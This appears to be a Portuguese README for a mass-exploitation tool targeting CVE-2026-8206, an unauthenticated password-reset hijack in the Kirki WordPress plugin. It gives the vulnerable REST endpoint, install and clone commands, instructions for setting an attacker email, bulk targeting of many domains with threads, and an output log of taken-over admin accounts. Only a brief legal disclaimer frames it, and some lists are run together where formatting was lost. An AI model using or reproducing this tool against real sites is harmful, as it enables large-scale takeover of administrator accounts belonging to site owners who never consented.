
Ferramenta de exploração em massa para CVE-2026-8206 – Escalação de privilégios não autenticada via 'handle_forgot_password' no plugin Kirki WordPress (≤6.0.6).
Ferramenta de exploração em massa para CVE-2026-8206 – uma vulnerabilidade crítica no plugin Kirki WordPress (versões ≤ 6.0.6) que permite que atacantes não autenticados sequestrem links de redefinição de senha e assumam o controle de qualquer conta de usuário, incluindo administradores.
O plugin Kirki expõe um endpoint REST não autenticado (/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password). Devido à ausência de verificações de permissão e à validação inadequada de e-mail, um atacante pode:
Versões afetadas: ≤ 6.0.6
Versão corrigida: 6.0.7
readme.txt e kirki.min.css (suporta as pastas kirki e kirki-test)/wp-json/wp/v2/users (alternativa: admin)requestsconcurrent.futures (backport, geralmente instalado)Instalar dependências:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
Edite o script para definir o seu e-mail de atacante:
ATTACKER_EMAIL = "[email protected]" # line ~15
python CVE-2026-8206.py <targets_file> [threads]
<targets_file> – arquivo de texto com um domínio por linha (com ou sem http:///https://)[threads] – opcional, número de threads simultâneas (padrão: 15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – contém os alvos explorados com sucesso no formato:
URL|username|attacker_email|reset_link_sent_to_attacker_email
Exemplo:
https://example.com|admin|[email protected]|reset_link_sent_to_attacker_email
A saída do console mostra o progresso em tempo real:
/wp-content/plugins/{kirki,kirki-test}/readme.txt (Stable tag) e /.../kirki.min.css (parâmetro ver). Se a versão for ≤ 6.0.6, prossegue./wp-json/wp/v2/users; se estiver vazio, recorre a admin.username = nome de usuário alvoemail = e-mail do atacanteemailBody = JSON que inclui o chip reset_link200 e "Email sent", o alvo é gravado em .Este software é fornecido apenas para fins educacionais e de teste de segurança autorizado. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão de teste é ilegal. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
Você pode ver mais avisos legais na página de Jenderal92. Confira AQUI !!!
res.txt